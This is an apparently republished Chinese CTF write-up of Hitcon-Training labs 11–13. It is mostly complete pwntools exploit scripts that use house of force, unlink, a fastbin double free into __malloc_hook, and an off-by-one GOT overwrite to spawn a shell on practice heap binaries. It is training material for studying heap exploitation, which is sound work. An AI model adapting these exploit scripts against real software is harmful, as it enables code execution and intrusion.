美文网首页
Hitcon-Training之lab11-lab13

Hitcon-Training之lab11-lab13

作者: cceb9d5a8577 | 来源:发表于2018-09-02 22:22 被阅读170次

    lab11 bamboobox

    先来看一下这题的基本信息和漏洞点






    以上就是这道题目的漏洞点,大概有三种方法可以用来解题:

    方法一:利用house of force,修改top chunk大小再分配chunk,实现任意地址写,调用magic函数

    具体的原理可以看ctf-wiki中的介绍,不算难理解

    #encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")

ip =""
if ip:
    p = remote(ip,20004)
else:
    p = process("./bamboobox", aslr=0)

elf = ELF("./bamboobox")

def sl(s):
    p.sendline(s)
def sd(s):
    p.send(s)
def rc(timeout=0):
    if timeout == 0:
        return p.recv()
    else:
        return p.recv(timeout=timeout)
def ru(s, timeout=0):
    if timeout == 0:
        return p.recvuntil(s)
    else:
        return p.recvuntil(s, timeout=timeout)
def getshell():
    p.interactive()


def show():
    ru("Your choice:")
    sd("1")
def add(index,content):
    ru("Your choice:")
    sd("2")
    ru("Please enter the length of item name:")
    sd(str(index))
    ru("Please enter the name of item:")
    sd(content)
def change(index,length,content):
    ru("Your choice:")
    sd("3")
    ru("Please enter the index of item:")
    sd(str(index))
    ru("Please enter the length of item name:")
    sd(str(length))
    ru("Please enter the new name of the item:")
    sd(content)

def delete(index):
    ru("Your choice:")
    sd("4")
    ru("Please enter the index of item:")
    sd(str(index))
def chunk(i):
    return 0x6020c8+i*0x10

magic = 0x400d49
atoi_got = elf.got["atoi"]
#--------------------------------------------------------------------
#方法一
add(0x50,'aaaa')
payload = 'a'*(0x50)+p64(0)+ p64(0xffffffffffffffff)
change(0,len(payload),payload)
# gdb.attach(p)
# pause()
heap_base = -(0x50 + 0x10)-(0x10+0x10)
malloc_offset = heap_base -0x10
add(malloc_offset,'bbbb')
pause()
add(0x10,p64(magic)*2)
#print p.recv()
pause()
ru("Your choice:")
sl("5")
getshell()

    方法二:利用unlink操作,调用magic函数

    #方法二
add(0x80,"a"*8)chunk0
add(0x80,"b"*8)chunk1
add(0x80,"c"*8)chunk2
#需要注意,这三个chunk的大小都要保证不在fastbin的范围内
#因为fastbin的size的p位默认为1,就无法进行unlink操作

FD = 0x6020c8 - 3*8#在bss段,0x6020c8恰好存储了chunk0的指针
BK = FD +8
payload1 = p64(0)+p64(0x81)+p64(FD)+p64(BK)+"a"*0x60
payload1 += p64(0x80)+p64(0x90)
change(0,0x90,payload1)
delete(1)
#构造一个假的大小为0x80的fake_chunk,同时通过堆溢出
#将chunk1的pre_size和size进行修改,使得size的p位为0
#在free掉chunk1的时候,fake_chunk和chunk1就会进行合并
#这时就会对fake_chunk进行unlink操作
#这时就要对FD和BK进行精心构造,使得能够绕过unlink的检查
#也就是使得:FD->bk = p  &&  BK->fd = p
#在通过检查后,unlink会导致:*p=p-3*8=0x6020c8 - 3*8


payload2 = p64(0)+p64(0)+p64(0x80)+p64(FD)+p64(0x80)+p64(atoi_got)
change(0,len(payload2),payload2)
change(1,0x10,p64(magic))
#这时向chunk0中输入内容,实际上也就是向0x6020c8 - 3*8中输入内容
#于是,就可以为所欲为地修改chunk_list,从而构造 UAF 
ru("Your choice:")
sl("5")
getshell()
#ps:这里有个玄学问题是,只能改chunk1的为atoi的got表,改chunk0就不行。。。很迷

    方法三,利用unlink,构造system(/bin/sh)

    #方法三
#前面的内容和方法二一样,paylode2后就不一样
payload2 = p64(0)+p64(0)+p64(0x80)+p64(atoi_got)
#ps:是真的迷,如果用这种方法,改chunk0为atoi的got表就可以成功
change(0,0x20,payload2)
show()
ru("0 : ")
atoi = u64(ru("2 : ")[:6].ljust(8,"\x00"))
print "atoi----->"+hex(atoi)

#通过atoi的真实地址,去libc查找可以得到以下:
offset_system = 0x0000000000045390
offset_atoi = 0x0000000000036e80
libc_base = atoi-offset_atoi
system = libc_base+offset_system

change(0,0x8,p64(system))
sl("/bin/sh\x00")
sl("5")

getshell()

    lab12

    醉了,这题和网鼎杯半决赛的pwn3基本上一毛一样,就题目描述改了一下,当时没做出血亏orz,做法和那题一样:2018-网鼎杯 pwn(部分线上+线下)
    直接贴exp了:

    #encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")

ip =""
if ip:
    p = remote(ip,20004)
else:
    p = process("./secretgarden")#, aslr=0

elf = ELF("./secretgarden")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
    p.sendline(s)
def sd(s):
    p.send(s)
def rc(timeout=0):
    if timeout == 0:
        return p.recv()
    else:
        return p.recv(timeout=timeout)
def ru(s, timeout=0):
    if timeout == 0:
        return p.recvuntil(s)
    else:
        return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
    gdb.attach(p,'')
    pause()
def getshell():
    p.interactive()
#-------------------------------------
def create(size,name,color):
    ru("Your choice : ")
    sl("1")
    ru("Length of the name :")
    sl(str(size))
    ru("The name of flower :")
    sd(name)
    ru("The color of the flower :")
    sl(color)

def visit():
    ru("Your choice : ")
    sl("2")

def remote(index):
    ru("Your choice : ")
    sl("3")
    ru("Which flower do you want to remove from the garden:")
    sl(str(index))

def clean():
    ru("Your choice : ")
    sl("4")

create(0x98,"a"*8,"1234")
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)
create(0x20,"b"*8,"b"*8)
remote(0)
clean()
create(0x98,"c"*8,"c"*8)
visit()

ru("c"*8)
leak = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak -0x58-0x10 -libc.symbols["__malloc_hook"]
print "leak----->"+hex(leak)
malloc_hook = libc_base +libc.symbols["__malloc_hook"]
print "malloc_hook----->"+hex(malloc_hook)
print "libc_base----->"+hex(libc_base)
one_gadget = 0xf02a4 + libc_base


remote(1)
remote(2)
remote(1)
#debug()
create(0x68,p64(malloc_hook-0x23),"b"*4)
create(0x68,"b"*8,"b"*8)
create(0x68,"b"*8,"b"*8)

create(0x68,"a"*0x13+p64(one_gadget),"b"*4)

remote(1)
remote(1)

getshell()

    lab13
    常规的保护机制


    这题应该算是一个off_by_one吧,只能溢出一个字节,改变下一个chunk的size,然后再free,然后再create,再进行操作
    主要的漏洞点在edit函数:


    主要的思路是:
    *create两个chunk,用chunk0溢出到chunk1 的size位,然后free掉chunk1
    *申请一个新的chunk2,使得chunk2落在chunk1size的部分从而修改指针
    *改free的got表为system的地址,然后使得chunk0 的内容为/bin/sh,接着free(chunk0)从而getshell
    exp如下:

    #encoding:utf-8
from pwn import *
context(os="linux", arch="amd64",log_level = "debug")

ip =""
if ip:
    p = remote(ip,20004)
else:
    p = process("./heapcreator")#, aslr=0

elf = ELF("./heapcreator")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
    p.sendline(s)
def sd(s):
    p.send(s)
def rc(timeout=0):
    if timeout == 0:
        return p.recv()
    else:
        return p.recv(timeout=timeout)
def ru(s, timeout=0):
    if timeout == 0:
        return p.recvuntil(s)
    else:
        return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
    gdb.attach(p,'')
    pause()
def getshell():
    p.interactive()
#-------------------------------------
def create(size,contant):
    ru("Your choice :")
    sl("1")
    ru("Size of Heap : ")
    sl(str(size))
    ru("Content of heap:")
    sd(contant)

def edit(Index,contant):
    ru("Your choice :")
    sl("2")
    ru("Index :")
    sl(str(Index))
    ru("Content of heap : ")
    sd(contant)

def show(Index):
    ru("Your choice :")
    sl("3")
    ru("Index :")
    sl(str(Index))

def delete(Index):
    ru("Your choice :")
    sl("4")
    ru("Index :")
    sl(str(Index))

free_got = elf.got["free"]
print "free_got------>"+hex(free_got)
create(0x18,"a"*8)
create(0x10,"b"*8)
edit(0,"/bin/sh\x00"+"a"*0x10+p64(0x41))
#debug()
delete(1)

create(0x30,p64(0)*4+p64(0x30)+p64(free_got))
show(1)
ru("Content : ")
free = u64(p.recv(6).ljust(8,"\x00"))
libc_base = free- libc.symbols["free"]
system = libc_base+libc.symbols["system"]
print "free------>"+hex(free)
print "libc_base------>"+hex(libc_base)
edit(1,p64(system))
delete(0)
getshell()
#debug()

    相关文章

      网友评论

          本文标题:Hitcon-Training之lab11-lab13

          本文链接:https://www.haomeiwen.com/subject/gqlvwftx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|Hitcon-Training之lab11-lab13|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!